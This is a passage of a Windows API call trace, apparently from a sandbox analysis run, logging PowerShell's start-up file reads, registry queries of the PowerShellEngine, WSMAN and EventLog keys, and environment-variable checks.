	[0846.766] ReadFile (in: hFile=0x2f4, lpBuffer=0x2fc24e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2fc24e0*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0846.766] CloseHandle (hObject=0x2f4) returned 1
	[0846.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0846.766] SetErrorMode (uMode=0x1) returned 0x1
	[0846.766] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0846.766] SetErrorMode (uMode=0x1) returned 0x1
	[0846.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0846.767] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0846.767] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0846.767] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0846.767] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0846.767] CoTaskMemFree (pv=0x1b9e8310) 
	[0846.767] RegCloseKey (hKey=0x2f4) returned 0x0
	[0846.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0846.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0846.768] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0xc2f449c5, Data2=0xdc5a, Data3=0x4783, Data4=([0]=0x8c, [1]=0x62, [2]=0x66, [3]=0x9c, [4]=0x57, [5]=0xf, [6]=0xc0, [7]=0x58))) returned 0x0
	[0846.769] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x55277c39, Data2=0x908c, Data3=0x4af3, Data4=([0]=0x93, [1]=0x43, [2]=0x92, [3]=0x16, [4]=0x27, [5]=0x20, [6]=0x6f, [7]=0x4a))) returned 0x0
	[0846.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0846.770] SetErrorMode (uMode=0x1) returned 0x1
	[0846.770] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0846.770] GetFileType (hFile=0x2f4) returned 0x1
	[0846.770] SetErrorMode (uMode=0x1) returned 0x1
	[0846.770] GetFileType (hFile=0x2f4) returned 0x1
	[0846.770] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0847.803] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0847.803] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0847.804] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0x1000, lpOverlapped=0x0) returned 1
	[0847.804] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0xe98, lpOverlapped=0x0) returned 1
	[0847.804] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff85e0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff85e0*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0847.804] ReadFile (in: hFile=0x2f4, lpBuffer=0x2ff8fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22d378, lpOverlapped=0x0 | out: lpBuffer=0x2ff8fe0*, lpNumberOfBytesRead=0x22d378*=0x0, lpOverlapped=0x0) returned 1
	[0847.804] CloseHandle (hObject=0x2f4) returned 1
	[0847.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0847.805] SetErrorMode (uMode=0x1) returned 0x1
	[0847.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x22d320 | out: lpFileInformation=0x22d320*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0847.805] SetErrorMode (uMode=0x1) returned 0x1
	[0847.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0847.805] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d408 | out: phkResult=0x22d408*=0x2f4) returned 0x0
	[0847.805] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d38c, lpData=0x0, lpcbData=0x22d388*=0x0 | out: lpType=0x22d38c*=0x1, lpData=0x0, lpcbData=0x22d388*=0x56) returned 0x0
	[0847.805] CoTaskMemAlloc (cb=0x5a) returned 0x1b9e8310
	[0847.805] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22d35c, lpData=0x1b9e8310, lpcbData=0x22d358*=0x56 | out: lpType=0x22d35c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22d358*=0x56) returned 0x0
	[0847.805] CoTaskMemFree (pv=0x1b9e8310) 
	[0847.806] RegCloseKey (hKey=0x2f4) returned 0x0
	[0847.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0847.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0847.806] VirtualQuery (in: lpAddress=0x22bea0, lpBuffer=0x22cd60, dwLength=0x30 | out: lpBuffer=0x22cd60*(BaseAddress=0x22b000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0847.810] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x35e1eef4, Data2=0x79c9, Data3=0x4e88, Data4=([0]=0x9e, [1]=0x7d, [2]=0xb6, [3]=0x6d, [4]=0xf1, [5]=0x1, [6]=0x26, [7]=0x58))) returned 0x0
	[0847.811] CoCreateGuid (in: pguid=0x22d630 | out: pguid=0x22d630*(Data1=0x5bb0f722, Data2=0x6650, Data3=0x4154, Data4=([0]=0x8f, [1]=0x81, [2]=0x30, [3]=0x91, [4]=0xd3, [5]=0x2f, [6]=0x42, [7]=0x0))) returned 0x0
	[0847.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0847.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0848.761] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.761] CoTaskMemFree (pv=0x3cee00) 
	[0848.762] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.762] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.762] CoTaskMemFree (pv=0x3cee00) 
	[0848.764] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.764] CoTaskMemFree (pv=0x3cee00) 
	[0848.765] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.765] CoTaskMemFree (pv=0x3cee00) 
	[0848.778] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.778] CoTaskMemFree (pv=0x3cee00) 
	[0848.779] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.779] CoTaskMemFree (pv=0x3cee00) 
	[0848.779] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0848.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0848.780] CoTaskMemFree (pv=0x3cee00) 
	[0848.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d618 | out: phkResult=0x22d618*=0x2f4) returned 0x0
	[0848.790] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d51c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d518*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0848.790] CoTaskMemFree (pv=0x0) 
	[0848.791] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0848.791] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x0, lpValueName=0x414760, lpcchValueName=0x22d5c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d5c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0848.791] CoTaskMemFree (pv=0x414760) 
	[0848.791] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0848.791] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x1, lpValueName=0x414760, lpcchValueName=0x22d5c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d5c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0848.791] CoTaskMemFree (pv=0x414760) 
	[0848.791] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0848.791] RegEnumValueW (in: hKey=0x2f4, dwIndex=0x2, lpValueName=0x414760, lpcchValueName=0x22d5c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d5c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0848.791] CoTaskMemFree (pv=0x414760) 
	[0848.792] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d5ac, lpData=0x0, lpcbData=0x22d5a8*=0x0 | out: lpType=0x22d5ac*=0x1, lpData=0x0, lpcbData=0x22d5a8*=0x8) returned 0x0
	[0848.792] CoTaskMemAlloc (cb=0xc) returned 0x48cc10
	[0848.792] RegQueryValueExW (in: hKey=0x2f4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d57c, lpData=0x48cc10, lpcbData=0x22d578*=0x8 | out: lpType=0x22d57c*=0x1, lpData="2.0", lpcbData=0x22d578*=0x8) returned 0x0
	[0848.793] CoTaskMemFree (pv=0x48cc10) 
	[0851.646] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d568 | out: phkResult=0x22d568*=0x2f8) returned 0x0
	[0851.647] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d46c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d468, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d46c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d468*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.647] CoTaskMemFree (pv=0x0) 
	[0851.647] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.647] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x0, lpValueName=0x414760, lpcchValueName=0x22d518, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x22d518, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0851.647] CoTaskMemFree (pv=0x414760) 
	[0851.647] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.647] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x1, lpValueName=0x414760, lpcchValueName=0x22d518, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x22d518, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0851.647] CoTaskMemFree (pv=0x414760) 
	[0851.647] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.647] RegEnumValueW (in: hKey=0x2f8, dwIndex=0x2, lpValueName=0x414760, lpcchValueName=0x22d518, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x22d518, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0851.647] CoTaskMemFree (pv=0x414760) 
	[0851.647] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d4fc, lpData=0x0, lpcbData=0x22d4f8*=0x0 | out: lpType=0x22d4fc*=0x1, lpData=0x0, lpcbData=0x22d4f8*=0x8) returned 0x0
	[0851.647] CoTaskMemAlloc (cb=0xc) returned 0x48cab0
	[0851.647] RegQueryValueExW (in: hKey=0x2f8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x22d4cc, lpData=0x48cab0, lpcbData=0x22d4c8*=0x8 | out: lpType=0x22d4cc*=0x1, lpData="2.0", lpcbData=0x22d4c8*=0x8) returned 0x0
	[0851.647] CoTaskMemFree (pv=0x48cab0) 
	[0851.649] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0851.649] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0851.649] CoTaskMemFree (pv=0x3cee00) 
	[0851.654] CoTaskMemAlloc (cb=0x104) returned 0x3cee00
	[0851.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0851.654] CoTaskMemFree (pv=0x3cee00) 
	[0851.660] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d598 | out: phkResult=0x22d598*=0x310) returned 0x0
	[0851.667] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d50c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d508, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d50c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d508*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.667] CoTaskMemFree (pv=0x0) 
	[0851.668] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.668] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x0, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.668] CoTaskMemFree (pv=0x414760) 
	[0851.668] CoTaskMemFree (pv=0x0) 
	[0851.668] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.668] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.668] CoTaskMemFree (pv=0x414760) 
	[0851.668] CoTaskMemFree (pv=0x0) 
	[0851.668] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.668] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x2, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.669] CoTaskMemFree (pv=0x414760) 
	[0851.669] CoTaskMemFree (pv=0x0) 
	[0851.669] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.669] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x3, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.669] CoTaskMemFree (pv=0x414760) 
	[0851.669] CoTaskMemFree (pv=0x0) 
	[0851.669] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0851.669] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x4, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0851.669] CoTaskMemFree (pv=0x414760) 
	[0851.669] CoTaskMemFree (pv=0x0) 
	[0851.669] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0853.401] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x5, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0853.401] CoTaskMemFree (pv=0x414760) 
	[0853.401] CoTaskMemFree (pv=0x0) 
	[0853.401] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0853.402] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x6, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0853.402] CoTaskMemFree (pv=0x414760) 
	[0853.402] CoTaskMemFree (pv=0x0) 
	[0853.402] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0853.402] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x7, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0853.402] CoTaskMemFree (pv=0x414760) 
	[0853.402] CoTaskMemFree (pv=0x0) 
	[0853.402] CoTaskMemAlloc (cb=0x204) returned 0x414760
	[0853.402] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x8, lpName=0x414760, lpcchName=0x22d598, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d598, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0853.402] CoTaskMemFree (pv=0x414760) 
	[0853.402] CoTaskMemFree (pv=0x0) 
	[0853.402] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x314) returned 0x0
	[0853.402] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.403] RegOpenKeyExW (in: hKey=0x310, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x318) returned 0x0
	[0853.405] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.405] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x31c) returned 0x0
	[0853.406] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.406] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x320) returned 0x0
	[0853.406] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.406] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x324) returned 0x0
	[0853.406] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
	[0853.406] RegOpenKeyExW (in: hKey=0x310, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x328) returned 0x0
	[0853.406] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d5f8 | out: phkResult=0x22d5f8*=0x0) returned 0x2
